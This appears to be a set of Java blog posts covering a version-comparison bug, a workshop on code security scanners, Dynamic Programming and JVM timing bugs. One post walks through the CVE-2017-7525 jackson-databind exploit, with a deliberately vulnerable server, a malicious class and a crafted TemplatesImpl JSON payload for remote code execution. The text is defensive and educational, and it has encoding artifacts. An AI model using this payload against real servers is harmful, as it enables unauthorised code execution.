In Java, is 2019 equals to 2019? Not always!

So, an interesting thing happened today and I wanted to let you know about it. I had an old piece of code that was comparing two integer values, expressed in strings. We used it in evaluating semantic versions, so to compare major/minor/patch values in a component version at Meterian. It never had problems, always worked like a champ, and it’s something like this:

if (Integer.valueOf(elem1) != Integer.valueOf(elem2)) {
    ... // something something

And I also had a weird bug opened from one of my customers telling me that the version comparisons were not working correctly for certain .NET packages, like this one, where versions are something like this:


That piece of code have been working for more that 4 years! What’s going on here? Wait… valueOf? I had my strong suspicion, but I wrote a simple snippet to prove it:

public static void main(String[] args) {

   String[] values = {"9", "99", "127", "128", "2019"};
   for (String value: values) {
       boolean equal = (Integer.valueOf(value) == Integer.valueOf(value));
       System.out.printf("Is %s equal to itself? %s %n", value, equal ? "YES" : "NO?");

And this is the output to enjoy!

Is 9 equal to itself? YES
Is 99 equal to itself? YES
Is 127 equal to itself? YES
Is 128 equal to itself? NO?
Is 2019 equal to itself? NO?

Ah! So what’s going on here? Well, as some of you suspected, the method valueOf() of Integer returns not a primitive int but an¬†Integer object. Like all objects, it’s potentially different for any other one if you use the operator “==” but that method is also a factory, that apparently caches (on my JVM) the numbers from 0 to 127! So those numbers are effectively represented by the same object instances and that’s the reason that code works, usually. We just needed a .NET guy who uses in a semantic version the number 2019 (a year) as the major version ūüôā

The obvious fix for this bug is to use Integer::parseInt that instead returns a primitive int value:

if (Integer.parseInt(elem1) != Integer.parseInt(elem2)) {
    ... // something something something

But bey, this was a story worth blogging about! Happy coding everybody!


Hi all, this is just a placeholder for my recent presentation at Geecon 2019. This is an upgraded version of the previous speech at IMWorld/Bucharest.

Please check my previous blog post to access the full descriptions of the demonstration. Enjoy!

IMWorld Bucharest

I’ve just had the great pleasure to present again in Bucharest at this year IMWorld¬†an introduction of security tools. We had some WiFi issues, so I had to change slightly the workshop contents, but the audience was very¬†sympathetic and overall we were all pleased with the results!

As the slides are covering only the introduction to the topic, I will now detail here the workshop contents so that you can reply what we did live!


SIS tools (Sensitive Information Scanners) are used to examine your codebase for the presence of information that should not be disclosed, like AWS or PGP keys.



Let’s start having a look at git-leaks. You can download the binary from here, unpack it and check it works with the command:

gitleaks-linux-amd64 ‚Äďhelp

As you can see there’re a lot of options, with the ability to run it against an entire organization for example, but you can now run the command against a sample repository:

gitleaks-linux-amd64 –repo=

As you can see it is reporting problems:¬†launch it again with –verbose, few problems pop up (what about those AWS keys???), you can also add¬† –report=report.csv –csv¬†to generate a csv report.

Now, why don’t you look at one of your OWN repositories? You could be surprised! Or try this one:

gitleaks-linux-amd64 –repo= ‚Äďverbose



trufflehog is a python tool, so extremely easy to install if you are on Linux! Just type:

sudo pip install trufflehog

You can check it works with:

trufflehog –help

There’s a lot you can do here: you can have tghe output in HSON, you can define extra rules, and so on. It deserves a bit of experimenting! But for the time being, please¬†rtun on the first repository:

trufflehog –regex

Again, we can see the AWS keys popping up (ops!). Now, try one of your repos, or maybe this one:

trufflehog –regex –entropy=False



Due to the slightly more complicated installation, we won’t have a look at these ones, but I suggest you check them out as well:

  • gitrob: very comprehensive analysis
  • git-secrets: a git hook provided directly by AWS



SDA tools (Sensitive Dependency Analysis), also known as SCAN (Software Composition ANalysis) are used to examine the software component you use in order to check if any of them is affected by known vulnerabilities. Here I will gently shamelessly plug the tool my startup is building, Meterian, and I hope you do not mind ūüôā



Download the latest client from the website and run it against a sample project (you can use this one we used in the previous blog post):

cd /your/project/folder
java -jar /path/to/meterian-cli.jar

You will probably be asked to authenticate, just use your GitHub or google account to do so. You will see some scores (the security one will be, well, very low!) and a¬†report will be generated: just click on the link to access it (again, same social login). If you used my example, jackson-databind 2.8.8 is definitely a winner! It’s potentially exposing your project to at least four different exploits… nice!

You can also see a list of possible upgrades for your libraries and (if the feature is

enabled for your account) also the full list of components and the related versions.



Download the client from the website, following the link from Github, in a folder, and run it against the same project used before:

cd /your/project/folder
dependency-check/bin/ –project sample –scan .

The long NVD database download may happen, it will take a while! Well, just have a coffee or something, then come back in 10 minutes and then find an HTML report in the folder:


Just open the report with a browser, you will see a list of the offending libraries.


SCA tools (Software Code Analysis), are used to examine the code you write, either in binary or source format.



Download and unpack the tool, then set the SPOTBUGS_HOME variable:

export SPOTBUGS_HOME=/path/to/spotbugs-3.1.3

Spotbus has a UI (of course it works also from the command line): launch the UI and do a quick demo:

java -jar $SPOTBUGS_HOME/lib/spotbugs.jar

Get some code on your laptop (I suggest the fastjson project, it has a wide attack surface): create a new project, select the binary output of the project (you may need to run mvn package on the project to get it) and select also the source code. Click the button and then dig into the problems: you have a lot to get through!

Spotbugs has a nice plugin, findecbugs, that specifically finds security problems: once you downloaded the plugin, copy the jar file in the plugin folder of spotbugs:

cp findsecbugs-plugin-1.8.0.jar $SPOTBUGS_HOME/plugin/

Open spotbugs again, re-run the analysis and enjoy a tour of the newly “security” section!


Download and unpack the tool, run the tool against the sample project from the newly created folder:

bin/ pmd -f text -d /path/to/project -R rulesets/java/quickstart.xml

There’re a number of rules here, enjoy some time in investigating them!


This can only be used as a plugin tool but it’s pretty effective!¬† Clone the repository:

git clone

Or just download the zip:

wget && unzip

Move to /examples, change the pom.xml so that it references 3.2.1 of errorprone and:

mvn clean package

Notice that the system stops with an error (the exception not thrown) plus the suggestion: fix the errors one by one, see the compilation passing :).


This is the last category of tools we see today, and it’s quite an interesting one. RASP tools basically will melt with your code, deploying an agent within it (typically using code instrumentation) and they will actively track any malicious activity: when that happens, the tool will take some preventive measures (i.e. stop the user session) and report the issue back to your company risk assessment system.


This is an open source tool by Baidu, that shows an interesting take on the probkem.

Download and install a fresh Tomcat from here, unpack and start Tomcat the usual way:

cd apache-tomcat-8.5.6/
bin/ run

Access and see Tomcat working!

Clone the test cases from here, move into the subfolder java/vulns and create the war package:

mvn package

Copy the newly created package under the /webapps subfolder of Tomcat: the server will promptly hot-deploy the application.

cp openrasp-testcases/java/vulns/target/vulns.war apache-tomcat-8.5.6/webapps/

Visit to see the application page (you may need google translate at this point to get a bit of English!) and try the exploit 002 and 004.2: see how is easy to bypass security and executing commands on the server.

Now, download the 0.31 Java openRASP from here, unpack and install it on Tomcat:

java -jar RaspInstall.jar -install  /path/to/apache-tomcat-8.5.6

Now, restart tomcat, you will see the OpenRASP logo in the console. Start tailing the openRASP log:

tail -f /path/to/apache-tomcat-8.5.6/rasp/logs/alarm/alarm.log

Try again to execute the vulnerabilities and… surprise!

  1. you are blocked with a fancy page ūüôā
  2. the logs show the intrusion with complete detail

Hope you enjoy it!


Are you using an opensource library? There’s a good chance you are vulnerable…

This is the talk I presented yesterday at Codemotion Rome 2018! Awesome conference and people, cannot wait for the next one!

You can find a detailed technical explanation in my previous blog post, and you can also have access to the code on GitHub to reproduce the exploit yourself.

Do not underestimate your problem, and put the correct procedure in place: you do not want to be the next Equifax.


Remotely execute Java code using JSON


How difficult is to exploit a vulnerability in a common Java library in order to remotely execute Java code on a remote server and successfully taking control over it? Not much, really. In this article, we will demonstrate how to do that using CVE- 2017-7525, a well-known vulnerability in jackson-databind, a widely used library to serialize and deserialize JSON, also part of the spring-boot stack.

The sample code.

As we all know, the task of serializing and deserializing JSON messages is a very common task, especially in modern microservices REST-based applications: almost every time an API is called, a JSON message is sent to the server, to be transformed in a Java object. Because of a stream of deserialization vulnerabilities in jackson-databind¬†it’s now possible to write simple exploits in order to get access to unpatched servers when¬†polymorphic type handling¬†is enabled.

In order to clearly explain the concepts, we are introducing here a simple server that handles products with two REST APIs, one to get the list of the products and one to add a new product  (all the code is available on GitHub). Please note that this is just a sample: we just want to provide you with a simple and understandable piece of code, and by no means it can be classified (we hope!) as production code.

A sample of our Product class, it holds some  basic product information:

public class Product {

    private int id;
    private String name;
    private String description;
    private Object data; 

    protected Product() {


Our ProductDatabase class, just a glorified HashMap

public class ProductsDatabase {

  private Map<String, Product> products = new HashMap<>();
  private AtomicInteger idGenerator = new AtomicInteger(0);

  public ProductsDatabase() {
     add(new Product(0,"apple", "Real apple from Italy", randomData()));
     add(new Product(0,"orange", "Real orange from Italy", randomData()));
     add(new Product(0,"kiwi", "Real kiwi from Italy", randomData()));

  public Collection list() {
    return Collections.unmodifiableCollection(products.values());

  public Product add(Product newProduct) {
    Integer newId = idGenerator.incrementAndGet();
    Product product = newProduct.duplicate(newId);
    products.put(newId.toString(), product);
    return product;


Our simple server, written with SparkJava:

public class Main {
  private static ProductsDatabase products = new ProductsDatabase();
  private static ObjectMapper deserializer = new ObjectMapper().enableDefaultTyping();
  private static ObjectMapper serializer = new ObjectMapper();
  public static void main(String[] args) {


    // GET list all products
    get("/products", (request, response) -> {
      Collection res = products.list();
      return serializer.writeValueAsString(res);

    // POST add new product
    post("/products", (request, response) -> {
      Product received = deserializer.readValue(request.body(), Product.class);

You can add a product to the database with a simple curl call with a JSON body containing the new product data:

curl -i -X POST -d '{"name":"melon","description":"Real melon from Italy", "data":["java.util.HashMap",{"cost":2,"color":"yellow"}]}' http://localhost:8888/products

The exploit.

In order to exploit the vulnerability, we need to have a vector. On this occasion we decided to use Apache Xalan, a common XSLT library also included in the JDK (which, until version 8u45, is possible to use as the vector, in the same way Xalan is used here). Please note that there are a lot of other options available as attack vectors, but for the sake of simplicity, we will focus here on a very specific one.

We will use a particular class from Xalan which is capable to deserialize an encoded class file from an XML, and dynamically create an instance of such class: we will craft a JSON message that will contain the encoded class of our exploit class here:

public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {

  public Exploit() throws Exception {
    System.err.println("Your server has been compromised!");

  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

We just need to compile this source code in a .class file, encoded it in Base64 and prepare our evil JSON message:

  "name": "fakeapple",
  "description": "Fake fruit from UK",
  "data": ["org.apache.xalan.xsltc.trax.TemplatesImpl",
    "transletName": "oops!",
    "outputProperties": {}

After sending the message to the server as a normal “add product” request, the encoded class will be instantiated by the Xalan TemplatesImpl class in order for it to populate the value of the outputProperties field: as the constructor¬†code is executed, the evil code is executed as well and the server compromised. Yes, you might have exceptions in the server, but it’s too late.


This is just an example of hundreds of exploits currently possible using public vulnerabilities on various open source libraries and for that reason, it’s extremely important that you add to your build pipeline a scanner capable to detect and block the build if such situation is detected. We would kindly invite you to use our simple command line client available at¬†and avoid future nasty surprises. You do not want to be the next Equifax.

You can reach me at!

`Disclaimer: please note that all these information are publicly available on the internet. This is just a summary post from a cybersecurity practitioner and nothing else. The code provided is for research purposes only.
Creative Commons Licence
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

Dynamic Programming explained (hopefully)

Okay, so some of you certainly already heard about Dynamic Programming (DP), but this is what I understood so far and I am happy to share with you.


In short, DP is all about ordering your computations in a way that avoids recalculating duplicate work: you have a main problem and a lot of subproblems.

There are two key attributes that a problem must have in order for DP to be applicable: optimal structure and overlapping subproblems:

  • when you have an optimal structure, then the optimal solution of a given problem can be obtained by the combination of optimal solutions of its subproblems
  • when you have overlapping subproblems then a solution of a problem should require the same subproblem again and again

Hey, please note that if a problem can be solved by combining optimal solution of non overlapping subproblems then we are in the “divide and conquer” area, where for example merge sort and quick sort lies.

Dynamic Programming is typically implemented using two common techniques, tabulation and memoization:

  • when you solve a DP problem using tabulation you solve the problem using a bottom-up approach, by solving all subproblems first, and creating a n-dimensional table: based on such table the solution to the original problem is computed. Because of that, tabulation solves all the subproblems.
  • when you solve a DP problem using memoization you do it by maintaining a map of already solved subproblem: you solve the problem¬†top-down, basically solving the top problem first and then recursing in solving the subproblems. Memoization may pay an overhead due to the recursion, but it does not need to solve all the subproblems

Please note that in DP you will often use backtracking, that incrementally builds candidates for the solution and then abandons them when it determines that they cannot contribute to the solution.

Some code, please!

Ok, all good. Now where do we go from here? Some code will help ūüôā A typical DP problem is the fibonacci sequence:

fib(n) = fib(n-1) + fib(n-2)

I guess you can already see the overlapping subproblems and the optimal structure: let’s try to solve this with the most natural solution (I guess), which is a recursion.

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
            return fib(val - 1) + fib(val - 2);

Ok, cool. It works: result! Pretty inefficient tough,  as it uses a large amount of stack memory and computes the solution to the same problem again and again! In fact, for example, to compute fib(5) it will compute three times fib(2). How can we improve this? Well, memoization comes in handy:

    private static Map<Integer, Integer> cache = new HashMap<Integer, Integer>();

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else {
            Integer res = cache.get(val);
            if (res == null) {
                res = fib(val - 1) + fib(val - 2);
                cache.put(val, res);
            return res;

Ok, this is better. At least we do not recompute a lot of times the same solution, but we still use a lot of stack memory, to handle the recursion. And, at the end of the day, we need to compute all the solution to solve this problem, don’t we? Why don’t we use tabulation then? if we do so, we can revert to a nice iterative solution!

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        int fibs[] = new int[val+1];
        fibs[0] = 1;
        fibs[1] = 1;
        for (int i=2; i<=val; i++)
            fibs[i] = fibs[i-1] + fibs[i-2];
        return fibs[val];

Ah, that’s better! No more recursion, a plain iterative process going on, just a bit of memory used for our table. But wait… can we do any better? Do we really need the whole table? Can we do better than Dynamic Programming?

    private static int fib(int val) {
        int prev = 0;
        int curr = 1;
        for (int i=2; i<=val; i++) {
            int next = curr + prev;
            prev = curr;
            curr = next;
        return curr;

Oh yeah ūüôā We just need to keep the last two values, n-1 and n-2: job done!

Conclusions (?)

DP was useful to think out the best algorithm, it was instrumental to discover it but, then, well, we needed that plain old spark of genius that not all of us have (certainly not me!) and some help has been very welcome. But without DP (and without a bigger spark) we would never easily found out an O(n) elegant and efficient solution: so it helps knowing about it. And sometimes some problems are really not solvable without DP, so please do not underestimate it!

Let me know if you are interested in this stuff, I can post more ūüôā



Java: no timeout on DNS resolution

Breaking news! I just discovered (well. actually yesterday) that it’s not possible to set a timeout on DNS resolution in Java, which relies on the underlying OS. This is NOT good when you have any shape or form of SLA or QOS, you basically potentially throwing it out of the window!

I suggest you do something about it, this is the code I pushed on msnos (see here code and test), basically it uses a Threadpool and a Future to make the magic happen:

import org.apache.http.conn.DnsResolver;
public class DnsResolverWithTimeout implements DnsResolver {

    public InetAddress[] resolve(final String host) throws UnknownHostException {

        Future<InetAddress[]> result = executor.submit(new Callable<InetAddress[]>() {
            public InetAddress[] call() throws Exception {
                return systemResolver.resolve(host);

        try {
            return result.get(timeoutInMillis, TimeUnit.MILLISECONDS);
        } catch (InterruptedException e) {
            log.warn("Unexpected interrupton while resolving host "+host, e);
        } catch (ExecutionException e) {
            log.warn("Unexpected execution exception", e.getCause());
        } catch (TimeoutException e) {
            log.warn("Timeout of {} millis elapsed resolving host {}", timeoutInMillis, host);

        throw new UnknownHostException(host + ": DNS timeout");

Of course you can make sure your OS is behaving, but you may not have such luxury ūüôā

JVM issue: concurrency is affected by changing the date of the system! [part 4]

I am frequently challenged about the seriousness of this bug and the impact that it has. It’s not the first time I try to explain that, because this bug affects LockSupport.parkNanos() it basically spreads like a virus across all the platform, but let’s see this more practically

$ grep -r -l "parkNanos" .

Well, it does not look that bad, does it? But uhm… I guess we are missing something… who’s using this classes? And who’s using such classes? And who’s using such classes? Omg… I am getting an headhache! Almost EVERYTHING is using this! So trust me, you will be affected. Maybe you are still not believing it, but please remember that this affects also Object:wait(:long) and so, transitively, also synchronized. Wait… WOOT? Oh yeah ūüôā So lots of fun! Especially when your system, deployed on client premises, starts doing “strange” things and you are called by your (not very happy) support team.

Be aware that this bug is now fixed in JDK8 and I have no knowledge of any successful backports of it into JDK7.

See also
The full saga, all the articles I published on the matter:

JVM issue: concurrency is affected by changing the date of the system! [part 3]

I have been asked further information about the matter and for that reason I am pushing a bit of more code here. It’s C++, so be aware of it! For the records, we are looking at the sources of the hotspot JVM, you can find the source here:

Let’s have a look at the park() function of PlatformEvent, which is used within all synchronization primitives of the JVM:

int os::PlatformEvent::park(jlong millis) {
   struct timespec abst;
   compute_abstime(&abst, millis);

   while (_Event < 0) {
     status = os::Linux::safe_cond_timedwait(_cond, _mutex, &abst);
     if (status != 0 && WorkAroundNPTLTimedWaitHang) {
       pthread_cond_destroy (_cond);
       pthread_cond_init (_cond, NULL) ;
     assert_status(status == 0 || status == EINTR ||
                   status == ETIME || status == ETIMEDOUT,
                   status, "cond_timedwait");
     if (!FilterSpuriousWakeups) break ;                 // previous semantics
     if (status == ETIME || status == ETIMEDOUT) break ;
     // We consume and ignore EINTR and spurious wakeups.

Please look at the line in bold, where the end time to wait is computed: if you open that function (line 5480) you will notice that it’s calculating an absolute time. based on the wall clock

   static struct timespec* compute_abstime(timespec* abstime, jlong millis) {

      if (millis < 0)  millis = 0;

      struct timeval now;
      int status = gettimeofday(&now, NULL);

So what will happen is that the park function will be waiting on an absolute time based on a wall clock, hence will fail miserably if the wall clock is changed.

The simplest fix, without changing too much code, would be to use the CLOCK_MONOTONIC (or CLOCK_MONOTONIC_RAW, even better) to compute the absolute time ( clock_gettime(CLOCK_MONOTONIC, &ts) ) and also to check it the same way in the main loop (you can associate any available clock with a pthread_cond_timewait)

Then, if we really want to stay on the safe side, we should avoid using absolute delays and use relative delays, as POSIX specs explicitly guarantees that threads waiting on a relative time are not affected to changes to the underling clock, while when using absolute delays the situation is historically “fuzzy”.

Is that complex? I does not look so, at least looking at the code (I will try to patch it myself for sure) but I surely do not grasp the complexity of the whole hotspot, so I may fail miserably. It also have to be noted that my C++ skills are kind of dated ūüôā

See also
The full saga, all the articles I published on the matter:

JVM issue: concurrency is affected by changing the date of the system! [part 2]

Based on a lot of questions I received in various mailing lists related to the previous post and in order to make the issue simpler and clearer I decided to go back to a binary deliverable (code) that shows the problem, hope this helps!

This is my PreciousPool class, that handles Precious resources:

import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;

public class PreciousPool {

    public static class Precious {
        private final int id;

        private Precious() {
   = 100+(int)(Math.random()*900.0);

        public String toString() {
            return "Precious n."+id;

    private final Lock lock;
    private final Condition ready;
    private final long timeoutInMillis;

    private final List preciousLended;
    private final List preciousAvailable;

    public PreciousPool(int size, long timeoutInSeconds) {
        this.lock = new ReentrantLock();
        this.ready = lock.newCondition();

        this.timeoutInMillis = 1000L*timeoutInSeconds;
        this.preciousLended =  new ArrayList();
        this.preciousAvailable = new ArrayList();

        for (int i = 0; i < size; i++) {
            preciousAvailable.add(new Precious());

    public Precious obtain()  {
        try {
            // if no precious are available we wait for the specified timeout (releasing the lock so that others can try)
            if (preciousAvailable.size() == 0) {
                try {
                    ready.await(timeoutInMillis, TimeUnit.MILLISECONDS);
                } catch (InterruptedException e) {
                    throw new RuntimeException("Somebody interrupted me!", e);

            // if a precious is available we unload it and return to the caller, otherwise null
            if (preciousAvailable.size() > 0) {
                Precious value = preciousAvailable.remove(0);
                return value;
            } else {
                return null;
        } finally {

    public void release(Precious value) {
        try {
            if (!preciousLended.remove(value))
                throw new RuntimeException("Element "+value+" was not lended!");

            // if a precious is returned we put it back and signal to anybody waiting
        } finally {

    public static void main(String args[]) {
        final int size = 3;
        final PreciousPool pool = new PreciousPool(size, 5);

        // let's exhaust the pool
        for (int i=0; i<size; i++)

        // and as we are stubborn we continuosly ask for a new one
        while(true) {

    private static void dump(Precious precious) {
        if (precious == null)
            log("I did not get my precious :(");
            log("I did get my precious! "+precious);

    private static void log(String message) {
        final String now = new SimpleDateFormat("HH:mm:ss:SSSS ").format(new Date());
        System.out.println(now + message);

So, the main is a single thread (no need for multithreading here, let’s keep it simple), that first exhaust the whole pool and then keep asking, without success, for a resource. Stubborn guy, I say, but it happens. If you run this program everything works as expected: you are greeted by a three successful Precious and then an endless list of failures, that it continuously grow. All good ūüôā

02:34:40:0061 I did get my precious! Precious n.156
02:34:40:0062 I did get my precious! Precious n.991
02:34:40:0062 I did get my precious! Precious n.953
02:34:45:0064 I did not get my precious!
02:34:50:0065 I did not get my precious!
02:34:55:0066 I did not get my precious!
02:35:00:0067 I did not get my precious!
02:35:05:0068 I did not get my precious!

But guess what happens when, while the program is running, I change the date of my system back of one hour? Everything stops, it’s simple as that. No prints, nothing, zero, nada. Now, If it wasn’t so late, I would probably wait one hour in order to have my program restored to his normal process, but as a customer I won’t be terribly happy ūüôā

See also
The full saga, all the articles I published on the matter: